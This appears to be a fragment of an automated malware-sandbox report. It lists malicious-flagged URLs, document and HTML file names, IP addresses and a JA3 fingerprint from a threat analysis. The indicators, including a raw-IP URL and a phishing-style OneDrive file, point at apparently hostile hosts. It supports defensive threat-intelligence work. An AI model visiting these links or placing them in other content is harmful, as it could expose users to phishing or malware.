http://reklambud.com/c/Quotes2083 | malicious | 91.239.232.41
https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu10534349.ct.sendgrid.net%2Fls%2Fclick%3Fupn%3D-2FbtVRd9V3LQUgEtjyb8YA5XmhEpbv4iLcVJ-2FGJhUgAfkEHt6B3RmIVNyFTABipTGkUFBuBHnG95MUsC0i9YMGNzzPvSDXmJpwr7fQsroe1GXyRN6JGXRt1V5rdZUHg1nUPf8avmHSg6g0d5KpN6Kd3gFFGzqkFijVEdqYia3cY1qaCD3fMzRUEejmVxIQXfQ0Kvr_ikc0R-2FOz4UQejsuOLNM1OL6q7Gk7uayIq07TEuMgZJMVAlgQBXWiX43y0HcrRUOJFtOcr86LTP-2F6yYNgd8upN0RzVnE2JBYvild3AaaJTgiNDjFutgPzjF0DL6bxZ-2FB46uiAaXqKwhLQnynk3uAodcU64L-2BkXDY4WHe-2F3xrJkjw8SwGa4SA5pyb3Kw4sfWSJ5P6mKMh8u8yx4W1RH2PJNaSVlNrhIWojXD4IIEy1pJQE8gMPjRlBPtu3jW4SaLyQ | malicious | 52.109.88.132
31(yb-aia).zip - OneDrive.html | malicious | 192.229.221.185
http://185.143.221.85 | malicious | 185.143.221.85
zAdPBr5vdQ.doc | malicious | 149.56.245.196
zAdPBr5vdQ.doc | malicious | 149.56.245.196

Match: unknown (second unknown-ASN entry, for the second contacted IP; its associated samples and IPs are the same list as the first unknown entry above)
              • 52.109.88.132
              31(yb-aia).zip - OneDrive.htmlGet hashmaliciousBrowse
              • 192.229.221.185
              http://185.143.221.85Get hashmaliciousBrowse
              • 185.143.221.85
              zAdPBr5vdQ.docGet hashmaliciousBrowse
              • 149.56.245.196
              zAdPBr5vdQ.docGet hashmaliciousBrowse
              • 149.56.245.196

              JA3 Fingerprints

              Match: 37f463bf4616ecd445d4a1937da06e19

              Dropped Files

              No context

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.